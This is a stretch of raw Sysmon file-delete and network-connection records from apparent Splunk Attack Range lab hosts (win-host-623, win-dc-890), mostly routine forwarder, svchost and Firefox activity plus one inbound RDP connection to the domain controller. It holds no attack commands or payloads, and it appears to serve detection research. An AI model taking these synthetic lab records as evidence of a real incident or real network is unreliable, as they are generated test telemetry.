Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F22B49524A7EC090C9F3529CBE67D482,SHA256=695802002FB1FEBBB3D5D1F46F34FA202BE7B62A43925507F2090E34F641AB97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810191Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:29.220{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAEBAFEAFC603BCD7DFD8D8C9B97F28E,SHA256=DB4FB2BC37035C036DD4E8D0A2F3436BFB76B3D1F588E230E830FFD0FA3C583F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810190Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:26.353{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57446-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:30.716{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=455388E3969DF94A2185AEACDFAA4C5D,SHA256=6F3FB4FEBD801F20B5226FF8F9B3E0FF569475D3C0FEC85B0B2266EE9702A138,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810194Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:30.220{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C741A8AC0982BFA605D3642B2FFA88A,SHA256=EAE61AF472CD9B4B8FCC1B8751664417802133BE67C89D392CE9961331051540,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810193Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:30.204{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL 
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=138DB49657E96012339607FC355062F3,SHA256=EECB09C9015EBA1ABA8CE81F345BA8798D1419931992D92622481813CCEFFEBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:31.733{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=564B848EF34F6749946EB7F9B6D2D2C1,SHA256=FD6658101A478DA63D49B910945CE6833BB99196B7059CB3D4FA2826786C0326,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810195Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:31.220{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=489595F92883EC4A0FE89490C4225D77,SHA256=8FA5A3F37DE08719643BAC54C88EEF82DD60189F293A6EFA30C78283AA9506BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:32.768{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57EF5CFC730DB9A33DDAAB3F7ACAADD6,SHA256=8174DFE30058CED051D35BA9C258AF9D79F078A71DBF6B03BA188FB51472206A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810196Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:32.235{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEA56E7F80D00EC12E536B4BDB30B355,SHA256=EF3A0EE0B2093A9368FDB6E8B85DFBF4C142FB733048EEA80CDBC2D261603A6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:33.798{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=021D82A509A5F2E4261D6537053288C0,SHA256=206A8FF0E311B318D005EA5A6018A13B9FBB2D2621673F3BD8644B6C2BFA0619,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810197Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:33.235{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=865E645B0C0C2C9ADB64767A8D08CBE5,SHA256=C2E422488ADC7DC7BDAA3211FDC6E68634B08D513670F52A776533EAB8413B36,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:26.595{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61949-false10.0.1.12-8000- 23542300x80000000000000001054255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:34.799{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F375805C1DA993E012DEA152357D24D,SHA256=6A742109DD6411B30245BC89D5B7EAAE3EBF6AD31B38B2C6C0C2C0D33C74B1BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810199Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:34.235{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7900F6109C64FD80E284AC337986CD52,SHA256=28102932BD43E3D1A20AB66F9357526483BBCE86141BEA795D9187DA573D51C7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810198Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:32.243{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57447-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:35.814{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEC236A2A184BA27F27D53AA44674AE3,SHA256=9438BF79EA8469F331F3758E83941F8E85871188469A154F5BD76E1A80B64640,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810200Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:35.240{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2FBC0218950535923C9989ADB513961,SHA256=76D44CBA84E8C550EB0137BA60227465D6C22AEBC39268BAE0D3D9D28FDD5146,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:36.831{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B29C63BF506B8E7CD60A205E84D3DBE4,SHA256=5A3D2794001456076ABDEBBB0905693B17910F97AADBD0296AC5487261B37C85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810201Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:36.240{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62AA8E9ECCF4713D2BC3C035D3BD8BFA,SHA256=E6CCF02451934E6D320B05C66BB856BB906E93D9E318D9810FB36B5C00CD41D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:37.852{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAD922C99B4E4EF3142B0BAF13FD9686,SHA256=DFDAA4C02F9F40638FFE6209F4C8C8074FFBBFB2AA9B3C5AF7E69F7F41E47FE6,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810202Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:37.256{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38EF1F1835A4D4C32A2D8107F940E654,SHA256=021D4EDDE920FB0DD97A1F65F8DA67A7CDAF641B2D3C0DA536BB63F276BED522,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.884{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D85744BF5B9C06ABBD50615587657E1,SHA256=EF35EC0EEF7B29773E84DD7D5C86B47D74ED054213E993BC490B839141DD195E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810203Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:38.256{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4542E568AE2597875EE415282D2EB84D,SHA256=05119759E3457DE572DCE0FAD3A44E92026E25F1EF166DEF8939A52376B33CA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.684{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=26E64695E1DCEA0EE91E359A9234A3DB,SHA256=6C77D9DF4B82E42472434EF6E83A175F20CE60C54E6816F20B8AFA87C27BFDE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.684{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7D6E9FDC8E0243CB76487B0227040286,SHA256=D3B4BF3175CB95CEBC2E1F6C4F73896C45CE2BCD3B2FA4FC1FE2575EEFED3EE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=75FA755B38FF8266B2EA481D8F23C99B,SHA256=324B5C4E93ACCA633D2292A5989D5C0DC9E4BC6782FEAC308582CB544563637B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=41FDBE2D09FD542790894903EF23774C,SHA256=955C490B908D6BEB0C02222A05CA44C1EDA2D0B1F6904027CF60A2AD8EBF71CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D88EBDBE70457889A57E5CFFB5DC448C,SHA256=FFCF6DB1EB27B9601F6CD6238C1D914F436B86451D74A80C5C66A022A3F0EA2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2D61ABFB532D8B434CA19848F5D3F092,SHA256=7CFC99FEB6FFABB18948903E25F8BBD395A5E2EB45F2D0F9957AF4A9501EAA94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4153549C5FA41C3C161A82615A59B811,SHA256=A8248840C631B4C2F2259630E6D7FB9FF6A679A0AC08081410559CD4F795E2B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=34004BEE4DB10736683E95E7C62226FA,SHA256=2F17C15505BB9659B42D89605758AB7D755B73B33A3ECD71FBAF81A0E7EDF9BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=728C35BFBD7629F1B4BE567F91762F80,SHA256=D96F7E447F5CE9E88D1A4AF760E4F6E45A2CC57BB54124E3D3EBA4754A046942,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=18D18CD95BDCBE1AF8DF8B9CCBAD9DED,SHA256=42F32AE26B4DA040D9D9F6DAC16FF0D552E806B275758460E39FC44965948227,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=84AF544275D3ADB5CC824B98272A5A38,SHA256=6CB2903501F00CE4C864C3E66F744B35EF1CF87FE0DAAEB12F5B3E3BA4161F43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=2517E992168012F3629A0E4765128C27,SHA256=5F95D92BCFDEAF04C2F3C341B16E519375FDD7CD843385DBC4310F6294EEDEF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:39.884{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=436260ACCD55A7A3A51990A287F4CB34,SHA256=91D7369619218DCD97953147993C4727C041397B6DD5F97F4B3220F1D8258D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810205Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:39.256{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C793D4395A877706D1F7276DCC2D796,SHA256=D3818F1C2484183C1099297E1C12CA917B4E1EC38ABD107A26DA83BD54E3E648,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810204Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:37.248{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57448-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:40.899{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=850532CB06871CCCFDA2384DD9ADADD7,SHA256=93902ED45518212F5ABB330757B76E3CDCE07E51B126E01A7F00E69AD804AAE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810206Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:40.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B425641F4AE634F2CA9375A20D6635B,SHA256=AB1FB2403C341CA2502DFF6FF6415719552EDEA0C30DE782C7BB4B97D209164C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:31.680{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61950-false10.0.1.12-8000- 23542300x80000000000000001054276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:41.900{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C63EF6A25F4F87512A94219B3411B88D,SHA256=2711AE1A5FFBDE0D8715D88441B76DCBBDCC1233356E5042FCA2D444755667A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810207Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:41.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02022D5611E1A9E7603510FA255EFB5F,SHA256=0AA9ADC7E0FDF8B6FFA8B01AB846D01998F3A33A33DEC8EE23C8897A7A9D8D7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:42.915{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=484091D351E509A649F8DA3F1E054FEE,SHA256=065491BFA75A9EBECFFAD894D0933EB732BC5AB4F35E81ABA01992E89EE67206,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810208Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:42.349{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AF2B55FB8C6DCE0EC73C7C9A0E2B7BB,SHA256=973949C9986F05E1B5AA89894EC2E4CDBCDDF00C3EEFA6E2D39B6591CE35630A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:34.942{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-50011-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001054278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:42.768{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=249E327DCFBE9E00F94DAFF7A8CE4F49,SHA256=DEF7BE7DCE5B323B23C6E9B57A03577D08DEF3792064911D34869D37FB6E789A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:42.768{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0B3DAC3257B90248045FD918D96214C6,SHA256=8D9EC7B569636414B169A79F0F5731830C08D988B9523BF2B5893C00CE0E1E1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:43.932{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF37F110E0CB87A1A239EB232567F67B,SHA256=41E5463CBD2EA181402C8E81D31EA73F6BDF87DE8F849B4E2F1E32E858CCD0FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810209Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:43.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F7B475793F8BFA9F81731C5ED98374C,SHA256=0F25A7961479D318D20047C6C08E199B7961407F82B80F9868185639EE081BAC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:36.727{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61951-false10.0.1.12-8000- 23542300x80000000000000001054282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:44.950{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
